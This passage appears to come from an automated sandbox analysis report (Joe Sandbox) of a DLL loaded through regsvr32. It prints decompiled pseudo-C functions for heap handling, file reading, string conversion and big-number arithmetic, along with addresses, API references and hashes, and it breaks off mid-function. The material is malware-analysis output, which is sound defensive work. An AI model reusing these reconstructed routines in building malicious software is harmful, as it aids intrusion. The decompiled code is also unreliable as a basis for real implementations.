                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: FreeHeap$memset$memcpy
                  • String ID:
                  • API String ID: 4172471534-0
                  • Opcode ID: 19c3d6e2ffa1d9129ebda51cd38f1831e22d6d71fe2475a4891dd23ee8e2eb9e
                  • Instruction ID: 54b9a56baf89d223affce05d04c9eed0c8a26e8b2822132c81dbcb815bbc5161
                  • Opcode Fuzzy Hash: 19c3d6e2ffa1d9129ebda51cd38f1831e22d6d71fe2475a4891dd23ee8e2eb9e
                  • Instruction Fuzzy Hash: A9418E32204A8982EA92DB56E4007DBB7A1F7CDBD4F55C012FE8947759EF38C64ACB40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 37%
                  			E00000001180008034(void* __ebx, signed int __edx, void* __ebp, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long __r8, intOrPtr* __r9, void* _a8, void* _a16, long long* _a24, void* _a32) {
                  				void* _t44;
                  				void* _t52;
                  				long long _t53;
                  				signed long long _t54;
                  				intOrPtr _t67;
                  				long _t68;
                  				long long _t70;
                  				void* _t77;
                  				intOrPtr* _t83;
                  				long _t87;
                  				void* _t88;
                  				void* _t90;
                  				struct _CRITICAL_SECTION* _t92;
                  				struct _CRITICAL_SECTION* _t96;
                  
                  				_t52 = _t77;
                  				 *((long long*)(_t52 + 8)) = __rbx;
                  				 *((long long*)(_t52 + 0x10)) = __rbp;
                  				 *((long long*)(_t52 + 0x20)) = __rsi;
                  				 *((long long*)(_t52 + 0x18)) = __r8;
                  				_t53 =  *0x8000d4a0;
                  				_t88 = __rcx;
                  				EnterCriticalSection(_t96);
                  				LeaveCriticalSection(_t92);
                  				HeapAlloc(_t90, _t87, _t68);
                  				_t70 = _t53;
                  				if (_t53 == __edx) goto 0x80008129;
                  				memset(??, ??, ??);
                  				EnterCriticalSection(??);
                  				r11d =  *((intOrPtr*)(__rcx + 0xa8));
                  				_t44 =  >=  ? r11d :  *((intOrPtr*)(__rcx + 0xa8));
                  				if (_t44 == 0) goto 0x80008111;
                  				_t54 = __edx + __edx * 4;
                  				_t14 = _t88 + 0x98; // 0x98
                  				_t16 = _t54 * 8; // 0xc
                  				_t83 = _t70 + _t16 + 0xc;
                  				_t67 =  *_t14;
                  				 *((intOrPtr*)(_t83 - 0xc)) =  *((intOrPtr*)(_t67 + 0x1c));
                  				 *((long long*)(_t83 + 0x14)) =  *((intOrPtr*)(_t67 + 0x10));
                  				 *_t83 =  *((intOrPtr*)(_t67 + 0x18));
                  				 *((intOrPtr*)(_t83 + 0x28 - 0x1c)) =  *((intOrPtr*)(_t67 + 0x18));
                  				if (_t44 + 0xffffffff != 0) goto 0x800080e7;
                  				LeaveCriticalSection(??);
                  				 *__r9 = __ebp + 1;
                  				 *_a24 = _t70;
                  				goto 0x8000812e;
                  				return 8;
                  			}

















                  0x180008034
                  0x180008037
                  0x18000803b
                  0x18000803f
                  0x180008043
                  0x180008054
                  0x18000805e
                  0x18000806f
                  0x180008082
                  0x18000809a
                  0x1800080a2
                  0x1800080a8
                  0x1800080b2
                  0x1800080bc
                  0x1800080c2
                  0x1800080cd
                  0x1800080d3
                  0x1800080d5
                  0x1800080da
                  0x1800080e2
                  0x1800080e2
                  0x1800080e7
                  0x1800080ef
                  0x1800080f7
                  0x1800080fe
                  0x18000810b
                  0x18000810f
                  0x180008116
                  0x180008121
                  0x180008124
                  0x180008127
                  0x18000814c

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterLeave$AllocHeapmemset
                  • String ID:
                  • API String ID: 3215818008-0
                  • Opcode ID: a5b05b0876b64fc44e85eded25e425ee8759b37968ca7e229990649024b80293
                  • Instruction ID: 1a3dd1e818266afc597f0a591a41220640f3dae03b5c6049ded73bf0a5c13329
                  • Opcode Fuzzy Hash: a5b05b0876b64fc44e85eded25e425ee8759b37968ca7e229990649024b80293
                  • Instruction Fuzzy Hash: F731A9B2A00B4896DB81CF5AE84878D77A0F748BD4F858026EF4D93360DF34CA9AC740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 39%
                  			E00000001180003698(void* __eflags, long long __rbx, void* __rcx, long long __rdx, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, short _a32) {
                  				void* _v32;
                  				short _v38;
                  				short _v40;
                  				long long _v48;
                  				signed short _v54;
                  				signed short _v56;
                  				void* __rsi;
                  				void* _t20;
                  				void* _t24;
                  				short _t30;
                  				signed short _t32;
                  				long long _t44;
                  				long _t56;
                  				long _t59;
                  				void* _t60;
                  				long long _t63;
                  				void* _t65;
                  				void* _t75;
                  				void* _t76;
                  
                  				_t45 = __rbx;
                  				_t75 = _t65;
                  				 *((long long*)(_t75 + 8)) = __rbx;
                  				 *((long long*)(_t75 + 0x10)) = __rbp;
                  				_t44 =  *0x8000d4a0;
                  				_t60 = __r8;
                  				_t63 = __rdx;
                  				_t20 = E00000001180001000(__rbx, _t75 - 0x20, __rdx, _t75 + 0x20);
                  				r12d = 0;
                  				if (_t20 != r12d) goto 0x8000376a;
                  				_t30 = _a32;
                  				_v38 = _t30;
                  				_v40 = _t30;
                  				_t32 = _t30 + 1 + _t30 + 1;
                  				_v54 = _t32;
                  				r8d = _t32 & 0x0000ffff;
                  				HeapAlloc(_t76, _t56, _t59);
                  				_v48 = _t44;
                  				if (_t44 == _t76) goto 0x8000375a;
                  				r8d = 0;
                  				_v56 = r12w;
                  				if (RtlOemStringToUnicodeString(??, ??, ??) - r12d >= 0) goto 0x80003731;
                  				RtlNtStatusToDosError(??);
                  				goto 0x80003748;
                  				_t24 = E00000001180005A0C((_v56 & 0x0000ffff) >> 1, _t45, _v48, _t60, _t63, _t63, _t60);
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				return _t24;
                  			}






















                  0x180003698
                  0x180003698
                  0x18000369b
                  0x18000369f
                  0x1800036ab
                  0x1800036b2
                  0x1800036b5
                  0x1800036c4
                  0x1800036c9
                  0x1800036d1
                  0x1800036d7
                  0x1800036dd
                  0x1800036e2
                  0x1800036ea
                  0x1800036ed
                  0x1800036f2
                  0x1800036f9
                  0x1800036ff
                  0x180003707
                  0x180003713
                  0x180003716
                  0x180003725
                  0x180003729
                  0x18000372f
                  0x180003743
                  0x180003754
                  0x180003764
                  0x18000377e

                  APIs
                    • Part of subcall function 0000000180001000: CreateFileW.KERNELBASE ref: 000000018000104A
                    • Part of subcall function 0000000180001000: GetFileSize.KERNEL32 ref: 000000018000105E
                    • Part of subcall function 0000000180001000: CloseHandle.KERNEL32 ref: 00000001800010D9
                    • Part of subcall function 0000000180001000: HeapFree.KERNEL32 ref: 00000001800010F0
                  • HeapAlloc.KERNEL32(?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 00000001800036F9
                  • RtlOemStringToUnicodeString.NTDLL ref: 000000018000371C
                  • RtlNtStatusToDosError.NTDLL ref: 0000000180003729
                  • HeapFree.KERNEL32(?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180003754
                  • HeapFree.KERNEL32(?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180003764
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: Heap$Free$FileString$AllocCloseCreateErrorHandleSizeStatusUnicode
                  • String ID:
                  • API String ID: 45859668-0
                  • Opcode ID: 9076e75a246ab2846ebd8e8eb0ec80191478d5bcc226e42bb9bdcc49be13810a
                  • Instruction ID: f5e01ebc0847fc45ed597bc040b189ed2f2401146e9d5498dfbecc36209ca11f
                  • Opcode Fuzzy Hash: 9076e75a246ab2846ebd8e8eb0ec80191478d5bcc226e42bb9bdcc49be13810a
                  • Instruction Fuzzy Hash: 6D217172218B5881E6A1DB26E44579E73A1FB8CBD4F549521FA8E83768DF38C649CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 60%
                  			E000000011800033B4(void* __eflags, long long __rbx, long long __rcx, long long __rdx, void* __r8, signed int __r9) {
                  				void* __rdi;
                  				intOrPtr _t65;
                  				intOrPtr _t87;
                  				intOrPtr _t100;
                  				intOrPtr _t101;
                  				intOrPtr _t105;
                  				signed long long _t107;
                  				void* _t112;
                  				void* _t120;
                  				signed long long _t123;
                  				signed long long _t130;
                  				intOrPtr* _t131;
                  				intOrPtr _t139;
                  				void* _t154;
                  				intOrPtr _t155;
                  				void* _t157;
                  				signed long long _t159;
                  				intOrPtr* _t160;
                  				void* _t163;
                  				void* _t165;
                  				void* _t166;
                  				intOrPtr* _t171;
                  				void* _t179;
                  				signed long long _t181;
                  				signed long long _t182;
                  				int _t185;
                  				int _t187;
                  				void* _t191;
                  
                  				 *((long long*)(_t165 + 0x18)) = __rbx;
                  				 *((long long*)(_t165 + 0x10)) = __rdx;
                  				 *((long long*)(_t165 + 8)) = __rcx;
                  				_t166 = _t165 - 0x660;
                  				_t155 =  *((intOrPtr*)(_t166 + 0x6c0));
                  				r13d = r9d;
                  				r9d =  *((intOrPtr*)(_t166 + 0x6c8));
                  				r9d = r9d - 1;
                  				_t123 = r9d - 1;
                  				if (__eflags < 0) goto 0x80003400;
                  				if ( *((intOrPtr*)(_t155 + _t123 * 4)) == 0) goto 0x800033f1;
                  				_t105 = __r9 + 1;
                  				 *((intOrPtr*)(_t166 + 0x28)) = _t105;
                  				if (_t105 == 0) goto 0x80003641;
                  				_t13 = _t123 + 0x20; // 0x20
                  				r14d = _t13;
                  				if ( *((intOrPtr*)(_t155 + _t123 * 4)) == 0) goto 0x8000342d;
                  				_t112 = 0 - r14d;
                  				if (_t112 >= 0) goto 0x8000342d;
                  				if (_t112 != 0) goto 0x80003422;
                  				r14d = r14d - 1;
                  				r8d = _t105;
                  				 *((intOrPtr*)(_t166 + 0x20)) = r14d;
                  				memset(_t191, _t187, _t185);
                  				_t16 = _t166 + 0x250; // 0x249
                  				r9d = r13d;
                  				r8d = r14d;
                  				_t130 = _t185 << 2;
                  				_t65 = E00000001180008AD0(_t112, _t130, _t16, __r8, _t155, _t179);
                  				_t17 = _t166 + 0x40; // 0x39
                  				r9d = _t105;
                  				 *((intOrPtr*)(_t166 + _t130 + 0x250)) = _t65;
                  				E00000001180008AD0(_t112, _t130, _t17, _t155, _t155, _t154);
                  				_t100 =  *((intOrPtr*)(_t166 + 0x40 + _t159 * 4));
                  				 *((intOrPtr*)(_t166 + 0x24)) = _t100;
                  				memset(_t163, ??);
                  				r13d = r13d - _t105;
                  				_t139 = _t105;
                  				_t181 = r13d;
                  				 *(_t166 + 0x30) = _t181;
                  				if (_t112 < 0) goto 0x800035ee;
                  				_t124 = _t181 + _t139;
                  				_t28 = _t181 * 4; // 0x249
                  				_t160 = _t166 + _t28 + 0x250;
                  				r9d = 0xffffffff;
                  				_t31 = _t124 * 4; // 0x249
                  				_t131 = _t166 + _t31 + 0x250;
                  				if (_t100 != r9d) goto 0x800034d0;
                  				_t101 =  *_t131;
                  				goto 0x800034fb;
                  				r8d = _t155 + 1;
                  				_t157 =  >  ? __r9 : (_t181 + _t139 << 0x20) + _t139 + _t181;
                  				_t44 = _t166 + 0x40; // 0x39
                  				_t171 = _t160;
                  				r10d = _t105;
                  				if (_t101 == 0) goto 0x8000357a;
                  				r12d = 0xffffffff;
                  				r9d =  *_t44;
                  				_t87 =  *_t160;
                  				r10d = r10d + r12d;
                  				_t176 = __r9 * _t163;
                  				 *_t171 = _t87;
                  				if (_t87 - r12d <= 0) goto 0x80003548;
                  				goto 0x8000354a;
                  				 *_t171 =  *_t171 - r9d;
                  				if ( *_t171 - r12d - r9d <= 0) goto 0x80003565;
                  				goto 0x80003567;
                  				if (r10d != 0) goto 0x80003517;
                  				_t107 =  *((intOrPtr*)(_t166 + 0x28));
                  				_t182 =  *(_t166 + 0x30);
                  				 *_t131 =  *_t131 - 0 + 0 + r11d;
                  				if ( *_t131 != 0) goto 0x80003595;
                  				_t47 = _t166 + 0x40; // 0x39
                  				r8d = _t107;
                  				_t120 = E000000011800049DC(_t160, _t47, _t171 + 4);
                  				if (_t120 < 0) goto 0x800035ae;
                  				_t48 = _t166 + 0x40; // 0x39
                  				r9d = _t107;
                  				 *_t131 =  *_t131 - E00000001180004D74(_t77,  *_t171, _t131, _t160, _t160, _t48);
                  				goto 0x8000357c;
                  				 *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x6a0)) + _t182 * 4)) = _t101 + 1;
                  				r13d = r13d - 1;
                  				 *(_t166 + 0x30) = _t182 - 1;
                  				r9d = 0xffffffff;
                  				if (_t120 >= 0) goto 0x800034c7;
                  				r14d =  *((intOrPtr*)(_t166 + 0x20));
                  				r8d =  *((intOrPtr*)(_t166 + 0x6c8));
                  				memset(??, ??, ??);
                  				_t57 = _t166 + 0x250; // 0x249
                  				r9d = _t107;
                  				r8d = r14d;
                  				E00000001180007220(_t120, _t131 - 4,  *((intOrPtr*)(_t166 + 0x6a8)), _t57, _t157, _t176, _t159);
                  				r8d = 0x40c;
                  				memset(??, ??, ??);
                  				r8d = 0x204;
                  				return memset(??, ??, ??);
                  			}































                  0x1800033b4
                  0x1800033b9
                  0x1800033be
                  0x1800033ce
                  0x1800033d5
                  0x1800033dd
                  0x1800033e0
                  0x1800033f1
                  0x1800033f4
                  0x1800033f8
                  0x1800033fe
                  0x180003400
                  0x180003404
                  0x18000340a
                  0x18000341a
                  0x18000341a
                  0x180003420
                  0x180003422
                  0x180003425
                  0x18000342b
                  0x18000342d
                  0x180003430
                  0x180003441
                  0x180003446
                  0x18000344b
                  0x180003456
                  0x180003459
                  0x18000345f
                  0x180003463
                  0x180003468
                  0x18000346d
                  0x180003473
                  0x18000347a
                  0x18000347f
                  0x180003490
                  0x180003494
                  0x180003499
                  0x18000349c
                  0x18000349f
                  0x1800034a2
                  0x1800034a7
                  0x1800034ad
                  0x1800034b1
                  0x1800034b1
                  0x1800034b9
                  0x1800034bf
                  0x1800034bf
                  0x1800034ca
                  0x1800034cc
                  0x1800034ce
                  0x1800034d3
                  0x1800034f7
                  0x1800034fd
                  0x180003505
                  0x180003508
                  0x18000350d
                  0x180003511
                  0x18000351a
                  0x180003520
                  0x180003524
                  0x180003527
                  0x18000353a
                  0x18000353f
                  0x180003546
                  0x18000354a
                  0x18000355c
                  0x180003563
                  0x18000356f
                  0x180003571
                  0x180003575
                  0x18000357a
                  0x18000357f
                  0x180003581
                  0x180003586
                  0x180003591
                  0x180003593
                  0x180003595
                  0x18000359a
                  0x1800035aa
                  0x1800035ac
                  0x1800035be
                  0x1800035c9
                  0x1800035cd
                  0x1800035d5
                  0x1800035db
                  0x1800035e1
                  0x1800035ee
                  0x1800035ff
                  0x180003604
                  0x18000360c
                  0x18000360f
                  0x180003615
                  0x180003624
                  0x18000362a
                  0x180003636
                  0x18000365b

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: memset
                  • String ID:
                  • API String ID: 2221118986-0
                  • Opcode ID: a76d0726cef9ae4b561de819fedaba575e74fa77d35c7135b84bcd3433ab4b61
                  • Instruction ID: ec3f035d16c0e924505bfe3f3cda61bac28d8e6f0fc5c54ff73492b97cc3beba
                  • Opcode Fuzzy Hash: a76d0726cef9ae4b561de819fedaba575e74fa77d35c7135b84bcd3433ab4b61
                  • Instruction Fuzzy Hash: EE61F532704A8486E772CE27E8457DABB95F3D8BC8F448125EE4953B98DF39E605CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: memcmp$FreeHeap
                  • String ID:
                  • API String ID: 1680564963-0
                  • Opcode ID: ebefc488027962227a33868cb32fed72d0b4f2502500ec4154850c2412e11902
                  • Instruction ID: e13f11c4693d54ee7f56904197b6c81cc0d09359d032e1af4ae6464abc78b12e
                  • Opcode Fuzzy Hash: ebefc488027962227a33868cb32fed72d0b4f2502500ec4154850c2412e11902
                  • Instruction Fuzzy Hash: 4551A172B0878955EBA2CB15A4843DA77A1A7AD7C4F54C025EE8C43786EE3DC64DC701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 37%
                  			E00000001180001EEC(void* __edi, void* __eflags, long long __rbx, long long __rcx, void* __rdx, void* __r8) {
                  				void* __rsi;
                  				signed int _t65;
                  				unsigned int _t66;
                  				signed int _t73;
                  				void* _t78;
                  				unsigned int _t85;
                  				void* _t87;
                  				void* _t91;
                  				void* _t112;
                  				int _t116;
                  				long long _t122;
                  				void* _t125;
                  				void* _t126;
                  				int _t143;
                  				void* _t145;
                  				void* _t148;
                  
                  				_t78 = __eflags;
                  				_t87 = _t125;
                  				 *((long long*)(_t87 + 0x10)) = __rbx;
                  				 *((long long*)(_t87 + 0x18)) = _t122;
                  				 *((long long*)(_t87 + 8)) = __rcx;
                  				_t126 = _t125 - 0x860;
                  				r14d =  *((intOrPtr*)(_t126 + 0x8b8));
                  				_t91 = __rdx;
                  				 *(_t126 + 0x30) = _t148 << 2;
                  				memcpy(_t148, _t145, _t143);
                  				_t9 = _t126 + 0x454; // 0x4a5
                  				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
                  				E00000001180003934(__rdx, _t9, _t148 << 2,  *((intOrPtr*)(_t126 + 0x8b0)));
                  				_t13 = _t126 + 0x658; // 0x6a9
                  				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
                  				E00000001180003934(_t91, _t13, _t148 << 2,  *((intOrPtr*)(_t126 + 0x8b0)));
                  				memset(_t112, _t116);
                  				 *((intOrPtr*)(_t126 + 0x40)) = 1;
                  				_t73 = __edi - 1;
                  				if (_t78 < 0) goto 0x80001faa;
                  				if ( *((intOrPtr*)(__r8 + (r9d - 1) * 4)) == 0) goto 0x80001f9a;
                  				r12d = _t73;
                  				if (_t73 < 0) goto 0x80002081;
                  				_t65 =  *(__r8 + _t73 * 4);
                  				if (_t73 != r12d) goto 0x80001fe8;
                  				if ((_t65 & 0xc0000000) != 0) goto 0x80001fe8;
                  				_t66 = _t65 << 2;
                  				if ((_t66 & 0xc0000000) == 0) goto 0x80001fd2;
                  				if (0x10000001e == 0) goto 0x80002075;
                  				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
                  				E00000001180003934(_t91, _t126 + 0x40, _t73,  *((intOrPtr*)(_t126 + 0x8b0)));
                  				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
                  				E00000001180003934(_t91, _t126 + 0x40, _t73,  *((intOrPtr*)(_t126 + 0x8b0)));
                  				_t85 = _t66 >> 0x1e;
                  				if (_t85 == 0) goto 0x80002068;
                  				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
                  				E00000001180003934(_t91, _t126 + 0x40, _t73,  *((intOrPtr*)(_t126 + 0x8b0)));
                  				if (_t85 != 0) goto 0x80001fef;
                  				if (_t85 >= 0) goto 0x80001fbb;
                  				memcpy(??, ??, ??);
                  				r8d = 0x60c;
                  				memset(??, ??, ??);
                  				r8d = 0x204;
                  				return memset(??, ??, ??);
                  			}



















                  0x180001eec
                  0x180001eec
                  0x180001eef
                  0x180001ef3
                  0x180001ef7
                  0x180001f03
                  0x180001f0a
                  0x180001f22
                  0x180001f2c
                  0x180001f31
                  0x180001f46
                  0x180001f51
                  0x180001f56
                  0x180001f6b
                  0x180001f76
                  0x180001f7b
                  0x180001f8a
                  0x180001f8f
                  0x180001f9a
                  0x180001fa0
                  0x180001fa8
                  0x180001faa
                  0x180001fb5
                  0x180001fbb
                  0x180001fc8
                  0x180001fd0
                  0x180001fd2
                  0x180001fde
                  0x180001fe2
                  0x180002006
                  0x18000200b
                  0x180002027
                  0x18000202c
                  0x180002036
                  0x180002038
                  0x18000205e
                  0x180002063
                  0x18000206f
                  0x18000207b
                  0x180002093
                  0x1800020a2
                  0x1800020a8
                  0x1800020b4
                  0x1800020da

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: memset$memcpy
                  • String ID:
                  • API String ID: 368790112-0
                  • Opcode ID: 9069574d71fd3576152aa11697abaa86dc79558948906a610bfcadaab4521cb1
                  • Instruction ID: c336bcc7fd0d3219ccdcc3e7649660a569ab46c29ccafd654ab2136e7df858a2
                  • Opcode Fuzzy Hash: 9069574d71fd3576152aa11697abaa86dc79558948906a610bfcadaab4521cb1
                  • Instruction Fuzzy Hash: ED416272204BCA95EB61DA12E4443EAB364F7D9BC4F418111FF8857B89DF39C60ACB40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 34%
                  			E00000001180006108(signed int __rbx, long long __rcx, void* __rdx, void* __r8, char _a8, long long _a16, intOrPtr _a24, intOrPtr _a48, intOrPtr _a56, long long _a64) {
                  				long long _v72;
                  				long long _v88;
                  				void* __rsi;
                  				void* __rbp;
                  				intOrPtr _t40;
                  				void* _t56;
                  				void* _t57;
                  				intOrPtr _t67;
                  				intOrPtr _t69;
                  				intOrPtr* _t73;
                  				signed long long _t90;
                  				void* _t92;
                  				void* _t108;
                  				void* _t110;
                  				intOrPtr* _t112;
                  
                  				_t72 = __rbx;
                  				_a16 = __rbx;
                  				_a8 = __rcx;
                  				_t69 =  *0x8000d4a0;
                  				_t57 = r8d;
                  				_v72 =  *((intOrPtr*)(_t69 + 8));
                  				_t8 = _t90 + 8; // 0x8
                  				r14d = _t8;
                  				HeapAlloc(??, ??, ??);
                  				if (_t69 == 0) goto 0x8000627d;
                  				if (_t57 == 0) goto 0x800061f7;
                  				_t112 = __rdx + 0x20;
                  				E00000001180006008(__rbx, __rcx, _t92, __rdx + (__rbx + __rbx * 4) * 8);
                  				if (_t69 == 0) goto 0x800061ec;
                  				r9d =  *((intOrPtr*)(_t112 - 8));
                  				_v88 = _t69 + (_t90 + _t90 * 2) * 8;
                  				_a24 = E00000001180006344(_t69, _t72, _a8, _t69, _t92,  *_t112, _t108, _t110);
                  				HeapFree(??, ??, ??);
                  				_t40 = _a24;
                  				if (_t40 == 0) goto 0x800061ec;
                  				_t56 = 0 + _t40;
                  				if (1 - _t57 < 0) goto 0x80006176;
                  				r14d = 8;
                  				if (1 != _t57) goto 0x80006225;
                  				_v88 = _a64;
                  				r14d = E00000001180007444(_t40, _t56, _t72, _t69, _a48, _a56);
                  				if (_t56 == 0) goto 0x8000626f;
                  				_t31 =  &_a8; // 0x8
                  				_t73 = _t31;
                  				if ( *_t73 == 0) goto 0x8000624b;
                  				HeapFree(??, ??, ??);
                  				if ( *((intOrPtr*)(_t73 - 8)) == 0) goto 0x80006265;
                  				_t67 =  *((intOrPtr*)(_t73 + 0xc));
                  				if (_t67 == 0) goto 0x80006265;
                  				HeapFree(??, ??, ??);
                  				if (_t67 != 0) goto 0x80006238;
                  				HeapFree(??, ??, ??);
                  				return r14d;
                  			}


















                  0x180006108
                  0x180006108
                  0x18000610d
                  0x180006121
                  0x180006128
                  0x180006148
                  0x18000614d
                  0x18000614d
                  0x180006151
                  0x18000615d
                  0x180006167
                  0x180006172
                  0x180006184
                  0x18000618f
                  0x180006191
                  0x1800061ae
                  0x1800061c0
                  0x1800061c7
                  0x1800061cd
                  0x1800061d6
                  0x1800061e2
                  0x1800061ea
                  0x1800061f1
                  0x1800061f9
                  0x180006218
                  0x180006222
                  0x180006232
                  0x180006234
                  0x180006234
                  0x18000623e
                  0x180006245
                  0x180006252
                  0x180006254
                  0x180006258
                  0x18000625f
                  0x18000626d
                  0x180006277
                  0x180006297

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: Heap$Freelstrlen$Alloc$Timelstrcatlstrcpy$AllocateFileSleepSystem_snprintf
                  • String ID:
                  • API String ID: 3514998008-0
                  • Opcode ID: 32a0b26bd92ab6956d2394037830c20eeece6c9e21b54aa9face044d742a5a88
                  • Instruction ID: d6b07597f5ec485a57081f9d46160005d1067fb2ae4cc7d855a507384812b52f
                  • Opcode Fuzzy Hash: 32a0b26bd92ab6956d2394037830c20eeece6c9e21b54aa9face044d742a5a88
                  • Instruction Fuzzy Hash: E1415E32604B8892EBA2CF56E8447DA77A1F788BC4F48C016EE5D93765DF38C649C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 60%
                  			E00000001180007DBC(void* __edx, void* __eflags, void* __rcx, long long __rdx, long long __r8, signed int _a8, long long* _a16, signed int* _a24, signed int _a32) {
                  				intOrPtr _v80;
                  				void* _v88;
                  				long _v96;
                  				signed int _v104;
                  				long long _v112;
                  				long long _v120;
                  				void* __rbx;
                  				void* __rsi;
                  				void* __rbp;
                  				signed int _t55;
                  				signed int _t63;
                  				void* _t64;
                  				void* _t71;
                  				void* _t73;
                  				signed int _t74;
                  				void* _t75;
                  				void* _t76;
                  				void* _t85;
                  				signed long long _t107;
                  				struct _FILETIME* _t110;
                  				void* _t128;
                  				void* _t129;
                  				long _t131;
                  				signed int _t132;
                  				void* _t135;
                  				void* _t137;
                  				void* _t147;
                  				void* _t148;
                  				void* _t149;
                  				signed int* _t150;
                  				long long _t151;
                  				void* _t153;
                  				signed long long _t155;
                  				void* _t157;
                  
                  				_t148 = _t137;
                  				 *((long long*)(_t148 + 0x18)) = __r8;
                  				 *((long long*)(_t148 + 0x10)) = __rdx;
                  				 *(_t148 + 0x20) =  *(_t148 + 0x20) & 0x00000000;
                  				r14d = 0;
                  				_v104 =  *0x8000d498;
                  				_t129 = __rcx;
                  				 *(_t148 - 0x58) =  *(_t148 - 0x58) & _t155;
                  				if (E00000001180001CB0(_t110, __rcx, _t148 - 0x60, _t135, _t148 + 8, _t157, _t155) == 0) goto 0x80007e19;
                  				_t11 = _t155 + 1; // 0x1
                  				r12d = _t11;
                  				_v96 = _t131;
                  				goto 0x80007e24;
                  				_t132 = _v96;
                  				r12d = 2;
                  				_t14 =  &_a32; // 0xba
                  				_t15 =  &_v88; // 0x42
                  				if (E00000001180008034(_t71, r12d, _t85, _t110, _t129, _t132, _t135, _t15, _t14, _t153, _t149) != 0) goto 0x80007fff;
                  				r8d = _a32;
                  				r13d = r8d;
                  				r13d = r13d - r12d;
                  				_t150 = _v88;
                  				if (_t132 == 0) goto 0x80007e7d;
                  				_t55 = _a8;
                  				_t150[0xa] = 1;
                  				_t150[0x12] = _t132;
                  				_t150[0xd] = _t55;
                  				_t150[0x10] = _t55;
                  				_t24 = _t129 + 0xb0; // 0xb0
                  				r9d = 0;
                  				 *_t150 = _v104 ^ 0x62ade362;
                  				_t150[3] =  *(_t129 + 0x48);
                  				_t150[2] =  *(_t129 + 0x4c);
